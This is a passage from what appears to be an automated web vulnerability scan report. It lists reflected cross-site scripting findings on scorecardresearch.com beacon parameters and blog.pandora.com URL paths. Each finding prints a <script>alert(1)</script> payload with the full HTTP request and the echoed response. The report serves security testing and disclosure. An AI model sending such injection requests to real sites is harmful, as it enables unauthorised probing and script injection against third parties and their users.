Expires: Sun, 16 Jan 2011 02:02:11 GMT
Date: Sun, 09 Jan 2011 02:02:11 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9c8a72<script>alert(1)</script>d9a8abda3bb", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.12. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4c5b<script>alert(1)</script>45d5c6bad11 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762c4c5b<script>alert(1)</script>45d5c6bad11&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:12 GMT
Date: Sun, 09 Jan 2011 02:02:12 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762c4c5b<script>alert(1)</script>45d5c6bad11", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.13. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5bdff<script>alert(1)</script>d89896135b9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=5bdff<script>alert(1)</script>d89896135b9&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:13 GMT
Date: Sun, 09 Jan 2011 02:02:13 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"5bdff<script>alert(1)</script>d89896135b9", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.14. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload dcd0e<script>alert(1)</script>d6e3eca22a6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=dcd0e<script>alert(1)</script>d6e3eca22a6&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:13 GMT
Date: Sun, 09 Jan 2011 02:02:13 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"dcd0e<script>alert(1)</script>d6e3eca22a6", c10:"164121", c15:"", c16:"", r:""});

3.15. http://blog.pandora.com/faq [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 327


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p>
...[SNIP]...

3.16. http://blog.pandora.com/faq/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p>
...[SNIP]...

3.17. http://blog.pandora.com/faq/index.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p>
...[SNIP]...

3.18. http://blog.pandora.com/faq/index.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq/index.xmld7f75<script>alert(1)</script>8dac30374f8 was not found on this server.</p>
...[SNIP]...

3.19. http://blog.pandora.com/jobs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /jobs

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bab7<script>alert(1)</script>a6fd1a47986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jobs1bab7<script>alert(1)</script>a6fd1a47986 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jobs1bab7<script>alert(1)</script>a6fd1a47986 was not found on this server.</p>
...[SNIP]...

3.20. http://blog.pandora.com/pandora/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a2e2<script>alert(1)</script>bf577de6d6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 332


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a2e2<script>alert(1)</script>bf577de6d6e/ was not found on this server.</p>
...[SNIP]...

3.21. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 95a59<script>alert(1)</script>8e7980713e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora95a59<script>alert(1)</script>8e7980713e3/archives/2005/07/ was not found on this server.</p>
...[SNIP]...

3.22. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a534<script>alert(1)</script>8a298db320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a534<script>alert(1)</script>8a298db320/2005/07/ was not found on this server.</p>
...[SNIP]...

3.23. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b191<script>alert(1)</script>638b7d947db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20058b191<script>alert(1)</script>638b7d947db/07/ was not found on this server.</p>
...[SNIP]...

3.24. http://blog.pandora.com/pandora/archives/2005/07/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6552d<script>alert(1)</script>a04c546c7c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/076552d<script>alert(1)</script>a04c546c7c1/ was not found on this server.</p>
...[SNIP]...

3.25. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1adf9<script>alert(1)</script>84f161db5a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1adf9<script>alert(1)</script>84f161db5a2/archives/2005/08/ was not found on this server.</p>
...[SNIP]...

3.26. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 55147<script>alert(1)</script>0105bf04052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives55147<script>alert(1)</script>0105bf04052/2005/08/ was not found on this server.</p>
...[SNIP]...

3.27. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 79994<script>alert(1)</script>e7a8e90b39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200579994<script>alert(1)</script>e7a8e90b39f/08/ was not found on this server.</p>
...[SNIP]...

3.28. http://blog.pandora.com/pandora/archives/2005/08/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2005/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8db7f<script>alert(1)</script>1733790e5e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

